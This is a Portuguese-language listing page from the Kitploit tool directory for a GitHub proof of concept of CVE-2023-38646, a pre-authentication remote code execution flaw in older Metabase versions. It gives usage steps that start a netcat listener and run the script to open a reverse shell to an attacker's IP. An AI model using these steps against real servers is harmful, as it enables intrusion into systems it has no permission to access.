Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-38646 — PoC de RCE pré-autenticação no Metabase | Kitploit
Ferramentas/GitHubGitHub/mrunalkaran/cve-2023-38646
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubmrunalkaran/cve-2023-38646

CVE-2023-38646

PoC de RCE pré-autenticação no Metabase

Ver Repositório
1há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Metabase Pre-Auth RCE POC - CVE-2023-38646

Metabase open source antes da versão 0.46.6.1 e Metabase Enterprise antes da versão 1.46.6.1 permitem que atacantes executem comandos arbitrários no servidor. Eu escrevi o script diretamente para obter um reverse shell na máquina do atacante.

Uso

O script requer a URL de destino, o IP do atacante e a porta. Fornecer o token de configuração não é necessário para este exploit, pois o script tenta obtê-lo de /api/session/properties.

Certifique-se de iniciar o listener netcat na máquina do atacante usando o seguinte comando: nc -nlvp {Port}

Execute o script POC com:

  • -u - URL de destino (Metabase)
  • -ip - IP do atacante
  • -p - Número da porta
root@kitploit:~
python3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>

POC

Referências

  • https://github.com/m3m0o/metabase-pre-auth-rce-poc/
  • https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
Baixar ferramenta